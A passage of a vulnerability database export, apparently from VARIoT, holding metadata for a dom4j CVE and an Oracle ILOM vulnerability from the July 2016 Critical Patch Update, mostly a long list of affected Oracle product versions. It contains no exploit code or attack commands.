"2020-08-17T15:35:45", db: "PACKETSTORM", id: "158881", }, { date: "2020-04-15T00:00:00", db: "CNNVD", id: "CNNVD-202004-1133", }, { date: "2020-05-01T19:15:12.927000", db: "NVD", id: "CVE-2020-10683", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2022-07-25T00:00:00", db: "VULHUB", id: "VHN-163186", }, { date: "2023-07-04T00:00:00", db: "CNNVD", id: "CNNVD-202004-1133", }, { date: "2024-11-21T04:55:50.587000", db: "NVD", id: "CVE-2020-10683", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "PACKETSTORM", id: "159544", }, { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: "PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: "PACKETSTORM", id: "158881", }, { db: "CNNVD", id: "CNNVD-202004-1133", }, ], trust: 1.4, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "dom4j Code problem vulnerability", sources: [ { db: "CNNVD", id: "CNNVD-202004-1133", }, ], trust: 0.6, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "sql injection", sources: [ { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: "PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: "PACKETSTORM", id: "158881", }, ], trust: 0.7, }, }
var-201607-0653
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Infrastructure. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'Multiple' protocol. The 'Infrastructure' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0653", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", 